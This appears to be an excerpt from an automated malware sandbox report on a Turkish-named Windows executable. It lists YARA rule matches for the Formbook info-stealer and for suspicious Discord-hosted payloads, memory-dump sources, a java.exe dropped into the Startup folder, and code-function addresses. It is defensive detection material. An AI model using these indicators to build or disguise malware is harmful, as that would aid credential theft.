          Source: 0.2.Hesab#U0131 Onaylay#U0131n.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 31.0.java.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 34.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 34.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.java.exe.a00000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 34.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 34.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.java.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 30.2.java.exe.880000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000025.00000002.808079827.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000025.00000002.808079827.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000025.00000002.807067648.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000025.00000002.807067648.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000025.00000002.805766092.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000025.00000002.805766092.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000026.00000002.655815851.0000000000A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000026.00000002.655815851.0000000000A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_021940E80_2_021940E8
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219C7200_2_0219C720
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219E7200_2_0219E720
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_02196A380_2_02196A38
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_02194AF90_2_02194AF9
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_021948F00_2_021948F0
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219CEA80_2_0219CEA8
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_021977C80_2_021977C8
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219BB890_2_0219BB89
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219D8000_2_0219D800
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219C7030_2_0219C703
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219D3080_2_0219D308
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219F6400_2_0219F640
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE84300_2_05BE8430
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE37E80_2_05BE37E8
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE47D00_2_05BE47D0
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE56E80_2_05BE56E8
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE5FB10_2_05BE5FB1
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE6F600_2_05BE6F60
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE4ED00_2_05BE4ED0
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE3B880_2_05BE3B88
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE4B580_2_05BE4B58
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE84230_2_05BE8423
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE37DA0_2_05BE37DA
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE56D90_2_05BE56D9
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BEA0080_2_05BEA008
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE00060_2_05BE0006
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE00400_2_05BE0040
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE6F5A0_2_05BE6F5A
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE4B490_2_05BE4B49
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0B3A0A200_2_0B3A0A20
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0B3A0A100_2_0B3A0A10
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0B3A01A00_2_0B3A01A0
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E940E815_2_02E940E8
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9E72015_2_02E9E720
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9C72015_2_02E9C720
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E94AF915_2_02E94AF9
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E96A3815_2_02E96A38
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E948F015_2_02E948F0
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9CEA815_2_02E9CEA8
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E977C815_2_02E977C8
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9BB9815_2_02E9BB98
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9D80015_2_02E9D800
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9C70B15_2_02E9C70B
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9D30815_2_02E9D308
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9D31815_2_02E9D318
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9F64015_2_02E9F640
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_02E9BB8915_2_02E9BB89
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B25F815_2_057B25F8
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B25E815_2_057B25E8
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B040015_2_057B0400
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B66E215_2_057B66E2
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B66A115_2_057B66A1
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B10E015_2_057B10E0
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B10D015_2_057B10D0
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B03F015_2_057B03F0
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B2D1815_2_057B2D18
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B2D0815_2_057B2D08
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B0C7015_2_057B0C70
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B0C6A15_2_057B0C6A
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B1C8015_2_057B1C80
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B5E2815_2_057B5E28
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B5E1815_2_057B5E18
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B1BD815_2_057B1BD8
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B0A3815_2_057B0A38
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B0A2815_2_057B0A28
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_0BD80A1215_2_0BD80A12
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_0BD80A2015_2_0BD80A20
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_0BD801A015_2_0BD801A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B140E830_2_02B140E8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1E72030_2_02B1E720
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1C72030_2_02B1C720
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B14B0830_2_02B14B08
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B169B030_2_02B169B0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1491030_2_02B14910
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1CEB830_2_02B1CEB8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B177D830_2_02B177D8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1BB9830_2_02B1BB98
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1D81030_2_02B1D810
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1C70330_2_02B1C703
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B14AF930_2_02B14AF9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1CEA830_2_02B1CEA8
